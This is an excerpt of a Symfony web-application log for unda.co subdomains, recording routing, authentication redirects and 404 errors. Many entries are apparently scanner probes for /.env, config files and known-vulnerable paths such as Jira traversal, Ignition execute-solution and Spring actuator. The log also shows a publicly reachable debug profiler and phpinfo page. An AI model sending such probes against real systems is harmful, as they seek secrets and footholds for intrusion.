  5356. [2025-12-19 09:44:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5357. [2025-12-19 09:44:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5358. [2025-12-19 09:44:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5359. [2025-12-19 09:44:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5360. [2025-12-19 09:44:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5361. [2025-12-19 09:44:58] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  5362. [2025-12-19 09:48:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=twig","method":"GET"} []
  5363. [2025-12-19 09:48:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5364. [2025-12-19 09:48:56] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  5365. [2025-12-19 09:48:56] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5366. [2025-12-19 09:48:56] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5367. [2025-12-19 09:48:56] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5368. [2025-12-19 09:48:56] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5369. [2025-12-19 09:48:56] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5370. [2025-12-19 09:48:56] security.DEBUG: Calling Authentication entry point. [] []
  5371. [2025-12-19 09:53:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=security","method":"GET"} []
  5372. [2025-12-19 09:53:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5373. [2025-12-19 09:53:51] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5374. [2025-12-19 09:54:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  5375. [2025-12-19 09:56:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=time","method":"GET"} []
  5376. [2025-12-19 09:56:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  5377. [2025-12-19 09:57:17] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"HEAD"} []
  5378. [2025-12-19 09:57:17] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5379. [2025-12-19 09:57:17] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5380. [2025-12-19 09:57:17] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5381. [2025-12-19 09:57:17] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5382. [2025-12-19 09:57:17] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5383. [2025-12-19 09:57:17] security.DEBUG: Calling Authentication entry point. [] []
  5384. [2025-12-19 09:57:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"HEAD"} []
  5385. [2025-12-19 09:57:19] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  5386. [2025-12-19 09:57:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5387. [2025-12-19 09:57:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5388. [2025-12-19 09:57:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5389. [2025-12-19 09:57:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5390. [2025-12-19 09:57:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5391. [2025-12-19 09:57:19] security.DEBUG: Calling Authentication entry point. [] []
  5392. [2025-12-19 09:57:19] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  5393. [2025-12-19 09:57:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5394. [2025-12-19 09:57:21] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  5395. [2025-12-19 09:57:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  5396. [2025-12-19 09:57:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5397. [2025-12-19 09:57:21] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  5398. [2025-12-19 09:57:21] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5399. [2025-12-19 09:57:21] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5400. [2025-12-19 09:57:21] security.DEBUG: Calling Authentication entry point. [] []
  5401. [2025-12-19 09:57:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  5402. [2025-12-19 09:57:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"POST"} []
  5403. [2025-12-19 09:57:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5404. [2025-12-19 09:57:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5405. [2025-12-19 09:57:43] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5406. [2025-12-19 09:58:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=cache","method":"GET"} []
  5407. [2025-12-19 09:58:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5408. [2025-12-19 10:05:06] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  5409. [2025-12-19 10:05:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=security","method":"GET"} []
  5410. [2025-12-19 10:05:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5411. [2025-12-19 10:07:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  5412. [2025-12-19 10:12:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=request","method":"GET"} []
  5413. [2025-12-19 10:12:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5414. [2025-12-19 10:13:48] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5415. [2025-12-19 10:15:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  5416. [2025-12-19 10:15:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  5417. [2025-12-19 10:15:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5418. [2025-12-19 10:15:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  5419. [2025-12-19 10:15:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  5420. [2025-12-19 10:15:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  5421. [2025-12-19 10:15:02] security.DEBUG: Calling Authentication entry point. [] []
  5422. [2025-12-19 10:20:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=config","method":"GET"} []
  5423. [2025-12-19 10:20:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5424. [2025-12-19 10:24:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  5425. [2025-12-19 10:24:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5426. [2025-12-19 10:26:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c56c4f","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c56c4f","method":"GET"} []
  5427. [2025-12-19 10:26:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  5428. [2025-12-19 10:28:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=cache","method":"GET"} []
  5429. [2025-12-19 10:28:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5430. [2025-12-19 10:31:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32464c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32464c?panel=logger","method":"GET"} []
  5431. [2025-12-19 10:31:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  5432. [2025-12-19 10:32:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50c9dd","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/50c9dd","method":"GET"} []
  5433. [2025-12-19 10:32:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  5434. [2025-12-19 10:35:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=twig","method":"GET"} []
  5435. [2025-12-19 10:35:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  5436. [2025-12-19 10:35:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3","method":"GET"} []
  5437. [2025-12-19 10:35:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5438. [2025-12-19 10:38:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"565723","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/565723?panel=swiftmailer","method":"GET"} []
  5439. [2025-12-19 10:38:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  5440. [2025-12-19 10:39:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e1073a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e1073a?panel=config","method":"GET"} []
  5441. [2025-12-19 10:39:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5442. [2025-12-19 10:41:18] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  5443. [2025-12-19 10:43:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=security","method":"GET"} []
  5444. [2025-12-19 10:43:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  5445. [2025-12-19 10:51:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=request","method":"GET"} []
  5446. [2025-12-19 10:51:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5447. [2025-12-19 10:59:15] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  5448. [2025-12-19 10:59:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=config","method":"GET"} []
  5449. [2025-12-19 10:59:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  5450. [2025-12-19 11:06:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=cache","method":"GET"} []
  5451. [2025-12-19 11:06:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  5452. [2025-12-19 11:08:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=request","method":"GET"} []
  5453. [2025-12-19 11:08:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  5454. [2025-12-19 11:13:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19","method":"GET"} []
  5455. [2025-12-19 11:13:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  5456. [2025-12-19 11:13:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5457. [2025-12-19 11:15:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5458. [2025-12-19 11:16:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89abd5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/89abd5?panel=events","method":"GET"} []
  5459. [2025-12-19 11:16:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  5460. [2025-12-19 11:19:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
